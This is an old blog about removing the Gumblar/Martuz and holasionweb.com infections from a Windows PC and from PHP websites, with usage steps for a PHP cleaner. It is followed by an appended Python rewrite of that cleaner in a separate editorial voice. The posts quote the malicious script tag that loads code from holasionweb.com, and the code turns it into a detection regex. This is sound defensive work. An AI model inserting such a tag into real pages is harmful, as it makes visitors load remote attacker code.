Daniel Ansari’s blog Random software musings

May 12, 2010

holasionweb.com

Filed under: Malware — admin @ 2:44 pm

One of my Joomla sites on shared GoDaddy hosting got re-infected this morning with this malware, which runs this script from every php file that it infects:

<script src="http://holasionweb.com/oo.php"></script>

Interestingly, none of my other GoDaddy sites have got infected yet (and this blog is running an older version of WordPress), including one other Joomla site on the same server.

I modified my Gumblar removal script and added a regular expression to remove this malware.  It can be downloaded here.

Unlike the script at Sucuri.net (at the time of writing), this script does not leave a blank line at the top of your files, thus, you won’t get any errors from your web applications – it leaves your files in exactly the same state as before the infection.  It also saves your original infected file with a .bak extension, just in case you need to keep the originals for some reason.  These can be deleted later, and will not affect your site.

Instructions for use

  1. Place the file scan_files.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/scan_files.php
  3. Use scan_files.php?v=1 to run it in verbose mode.
  4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
  5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.

Notes:

  • The script skips files greater than approx 1 MB in size.
  • If the path to the file ends with /images/image.php or /images/gifimg.php, the script deletes it in update mode.  That’s because this was one of the signatures of the Gumblar malware.

Update (Aug 19, 2010): I added another script in scan_files.zip—that is delete_infected_backups.php.  In order to delete the .bak files:

  1. Place the file delete_infected_backups.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.  For the non-technical users, the address would be http://www.example.com/delete_infected_backups.php
  3. Use delete_infected_backups.php?u=1 to run it in update mode, where the .bak files will actually be deleted.
  4. The script deletes all files with names ending in:
    • .html.bak
    • .htm.bak
    • .shtml.bak
    • .js.bak
    • .php.bak

May 19, 2009

Automatic removal of Gumblar/Martuz trojan

Filed under: Malware — admin @ 11:08 pm

I won’t duplicate information contained on other websites, but I will refer to them here instead.

How your machine gets infected by Gumblar, or a “Gumblaroid” (Gumblar-type exploit) such as Martuz

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/
http://www.pcauthority.com.au/forums/yaf_postsm289075_A-nasty-virus-called-Gumblar.aspx

How to determine if your PC has the infection

http://www.dynamicdrive.com/forums/showthread.php?p=194695

These were the symptoms that I noticed on my PC:

1. My Visual Studio .NET 2005 was crashing a lot, and I could not get any work done using it.
2. In Firefox 3, each search result would initially redirect to a bogus ad page (I always open search results in a new tab), but clicking the search result once more would open the genuine page.
3. I could not start cmd from the XP Start/Run menu item.

How I removed this malware from my PC

1. I installed and scanned my PC with Malwarebytes’ Anti-Malware, which found the single file – in my case it was C:\WINDOWS\ukvvq.qnx – that was keeping the infection active. Manually deleting it, or letting Anti-Malware attempt to delete it, would delete it, but the file would reappear almost immediately. Don’t worry if Anti-Malware is unable to update its definitions online – this is another symptom of Gumblar – it still detects it, though as something else.
2. I ran Hijackthis (I didn’t need a scan), chose “misc tools”, and chose “delete file on reboot” for this file (according to http://www.dynamicdrive.com/forums/showthread.php?p=194695).
3. I ran regedit and deleted the registry entry (according to http://www.dynamicdrive.com/forums/showthread.php?p=194695).

That was it to remove it from my PC, voila! To protect my PC from re-infection, I disabled Adobe JavaScript according to http://www.pcauthority.com.au/forums/yaf_postsm289075_A-nasty-virus-called-Gumblar.aspx.

Unfortunately, it seems that several people resorted to rebuilding their machines from scratch.

How to remove the infection from a website

If you manage websites using an FTP program, there is a chance that your sites have become infected: Gumblar harvests the FTP credentials stored or used on the infected PC and uses them to modify the sites they unlock. The first thing you must do is change the FTP passwords, and do it only after your machine has been cleaned, otherwise the new passwords are stolen in the same way as the old ones.

As yet, I am unaware of any automated script which removes the infection from a website, so I wrote my own and applied it to 5 of the websites that I manage that were infected.

I started off using the script by rad-one at http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/comment-page-1/#comment-896.

I modified it heavily to use PHP regular expressions, to remove the gumblar modifications in html, php, and js files (it scans files with all extensions except .bak). Unlike rad-one’s detection script, this one yielded zero false positives for me, and eradicated the infection completely, as far as I can tell.

Here is what my script does:

1. Recurses through the whole website, excluding files and/or directories of your choosing.
2. Applies regular expressions to remove the infection from all the files (except those with the .bak extension) in each directory.
3. All modified files are backed up using the .bak extension.
4. Removes all files with paths ending in /images/image.php or /images/gifimg.php.
5. Runs in report mode by default, so you can see which files would be modified.
6. Has a “verbose” option, so you can see how each file will be modified.

It does not change directory permissions. I haven’t got around to investigating that area yet.

You may download it here. (Use at your own risk.)

Instructions for use

  1. Place the file scan_files.php at your web document root.
  2. Invoke it with no parameters to run it in report mode, where no modifications will be made.
  3. Use scan_files.php?v=1 to run it in verbose mode.
  4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
  5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.
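The report/update/verbose workflow just described, together with the holasionweb.com cleanup and the delete_infected_backups.php step from the May 2010 post above, as one added stand-alone example. This is not the author's scan_files.php and makes no claim about its regular expressions; it is a Python rewrite of the same workflow, written here, meant to be run from a shell (SSH, or over a downloaded copy of the site) rather than requested over HTTP. The only injection signature it carries is the holasionweb.com tag quoted in the first post; the Gumblar pattern itself does not appear on this page, so none is invented. The command-line flags, function names and the files built in the test are this example's own assumptions.

```python
"""Report/update cleaner for the injected <script> tag quoted in the post (added example)."""
import argparse
import os
import re
from pathlib import Path

MAX_SIZE = 1_000_000          # the post's script skips files over ~1 MB; so does this one

# The one signature the page shows: the holasionweb.com tag.  Surrounding spaces and
# the single newline injected with it are consumed too, so removal leaves no blank
# line behind (the defect the post attributes to another removal script).  Further
# byte-regexes for other injections go in this list; bytes avoid guessing encodings.
SIGNATURES = [
    re.compile(rb'[ \t]*<script\s+src=["\']http://holasionweb\.com/oo\.php["\']>\s*</script>[ \t]*\r?\n?',
               re.IGNORECASE),
]

# Paths the post names as a Gumblar dropper signature; deleted outright in update mode.
DROPPER_SUFFIXES = ("/images/image.php", "/images/gifimg.php")

# Backup names that delete_infected_backups.php removes, per the Aug 2010 update.
BACKUP_SUFFIXES = (".html.bak", ".htm.bak", ".shtml.bak", ".js.bak", ".php.bak")


def clean_content(data: bytes):
    """Strip every signature from data; return (cleaned_bytes, removal_count)."""
    total = 0
    for sig in SIGNATURES:
        data, n = sig.subn(b"", data)
        total += n
    return data, total


def scan_tree(root, update=False, verbose=False, exclude=()):
    """Walk root and return {relative_path: action}.  Report mode (update=False)
    changes nothing; update mode rewrites infected files after copying the
    original to <name>.bak and deletes dropper paths."""
    root = Path(root)
    actions = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in exclude]   # prune excluded dirs
        for name in filenames:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if ("/" + rel).endswith(DROPPER_SUFFIXES):
                if update:
                    path.unlink()
                actions[rel] = "deleted" if update else "would-delete"
                continue
            if name.endswith(".bak") or name in exclude or path.stat().st_size > MAX_SIZE:
                continue                                         # never touch backups or huge files
            original = path.read_bytes()
            cleaned, hits = clean_content(original)
            if hits == 0:
                continue
            if verbose:
                print(f"{rel}: {hits} injected tag(s)")
            if update:
                Path(str(path) + ".bak").write_bytes(original)   # keep the infected original
                path.write_bytes(cleaned)
            actions[rel] = "modified" if update else "would-modify"
    return actions


def delete_backups(root, update=False):
    """Counterpart of delete_infected_backups.php: list (or, with update=True,
    delete) the .bak files left behind by scan_tree.  Returns the relative paths."""
    root = Path(root)
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(BACKUP_SUFFIXES):
                path = Path(dirpath) / name
                found.append(path.relative_to(root).as_posix())
                if update:
                    path.unlink()
    return sorted(found)


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="scan a web root for the injected script tag")
    ap.add_argument("root", nargs="?", default=".")
    ap.add_argument("-u", "--update", action="store_true", help="actually modify files")
    ap.add_argument("-v", "--verbose", action="store_true", help="show what is removed")
    ap.add_argument("--delete-backups", action="store_true", help="remove .bak files instead")
    ap.add_argument("--exclude", nargs="*", default=[], help="directory or file names to skip")
    args = ap.parse_args()
    if args.delete_backups:
        for rel in delete_backups(args.root, args.update):
            print(("deleted " if args.update else "would delete ") + rel)
    else:
        for rel, action in sorted(scan_tree(args.root, args.update, args.verbose, args.exclude).items()):
            print(f"{action:13} {rel}")
```

Run it without flags first (report mode, nothing is written), then with -u once the list looks right; a second run after the update should report nothing, because the .bak copies are never scanned and the cleaned files no longer match. Files over the size limit are skipped silently, exactly as the post's script does, so a large infected file has to be handled by hand.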
